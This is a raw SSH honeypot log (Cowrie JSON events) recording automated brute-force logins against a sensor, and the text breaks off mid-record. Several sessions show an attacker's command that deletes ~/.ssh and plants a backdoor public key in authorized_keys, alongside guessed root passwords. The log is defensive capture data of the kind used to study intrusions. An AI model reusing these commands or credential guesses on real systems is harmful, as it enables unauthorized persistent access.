{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:09:07.037319Z","src_ip":"212.227.235.229","session":"cf25946d2fb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54408,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1e84a652aff","protocol":"ssh","message":"New connection: 212.227.235.229:54408 (1.2.3.4:22) [session: c1e84a652aff]","sensor":"my-vps","timestamp":"2025-08-31T06:09:09.779965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:09.780968Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:10.102616Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.login.success","username":"root","password":"AAAaaa123","message":"login attempt [root/AAAaaa123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:11.428416Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:12.088864Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:12.089625Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:12.090523Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.login.failed","username":"test4","password":"12345","message":"login attempt [test4/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:12.285629Z","src_ip":"212.227.235.229","session":"cf25946d2fb3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:12.413151Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:13.122182Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:09:13.123322Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:09:13.448217Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:13.449180Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55826,"dst_ip":"1.2.3.4","dst_port":22,"session":"272dac848fe5","protocol":"ssh","message":"New connection: 212.227.235.229:55826 (1.2.3.4:22) [session: 272dac848fe5]","sensor":"my-vps","timestamp":"2025-08-31T06:09:13.749136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:13.749832Z","src_ip":"212.227.235.229","session":"272dac848fe5"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:13.939417Z","src_ip":"212.227.235.229","session":"cf25946d2fb3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:14.052249Z","src_ip":"212.227.235.229","session":"272dac848fe5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48306,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d52d4f572a5","protocol":"ssh","message":"New connection: 212.227.235.229:48306 (1.2.3.4:22) [session: 1d52d4f572a5]","sensor":"my-vps","timestamp":"2025-08-31T06:09:15.275443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:15.276249Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:15.302013Z","src_ip":"212.227.235.229","session":"272dac848fe5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:15.444653Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer1234","message":"login attempt [root/Qwer1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:16.159941Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54870,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3250786cab","protocol":"ssh","message":"New connection: 212.227.235.229:54870 (1.2.3.4:22) [session: 7e3250786cab]","sensor":"my-vps","timestamp":"2025-08-31T06:09:16.357103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:16.358008Z","src_ip":"212.227.235.229","session":"7e3250786cab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:16.512367Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:16.513028Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:09:16.513828Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:16.605450Z","src_ip":"212.227.235.229","session":"272dac848fe5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.026832Z","src_ip":"212.227.235.229","session":"7e3250786cab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.029085Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57044,"dst_ip":"1.2.3.4","dst_port":22,"session":"61fd781cb5f7","protocol":"ssh","message":"New connection: 212.227.235.229:57044 (1.2.3.4:22) [session: 61fd781cb5f7]","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.030469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.031888Z","src_ip":"212.227.235.229","session":"61fd781cb5f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:09:17.223157Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.223910Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.327129Z","src_ip":"212.227.235.229","session":"61fd781cb5f7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.394548Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.395475Z","src_ip":"212.227.235.229","session":"1d52d4f572a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48320,"dst_ip":"1.2.3.4","dst_port":22,"session":"629fdfe2cba8","protocol":"ssh","message":"New connection: 212.227.235.229:48320 (1.2.3.4:22) [session: 629fdfe2cba8]","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.573506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.574191Z","src_ip":"212.227.235.229","session":"629fdfe2cba8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.748191Z","src_ip":"212.227.235.229","session":"629fdfe2cba8"}
{"eventid":"cowrie.login.failed","username":"splunk","password":"123456","message":"login attempt [splunk/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:17.842043Z","src_ip":"212.227.235.229","session":"7e3250786cab"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:18.487103Z","src_ip":"212.227.235.229","session":"629fdfe2cba8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:18.507877Z","src_ip":"212.227.235.229","session":"61fd781cb5f7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:18.805007Z","src_ip":"212.227.235.229","session":"61fd781cb5f7"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:18.832087Z","src_ip":"212.227.235.229","session":"c1e84a652aff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44748,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7fa26620e15","protocol":"ssh","message":"New connection: 212.227.235.229:44748 (1.2.3.4:22) [session: f7fa26620e15]","sensor":"my-vps","timestamp":"2025-08-31T06:09:18.944556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:18.945497Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:19.100783Z","src_ip":"212.227.235.229","session":"7e3250786cab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-n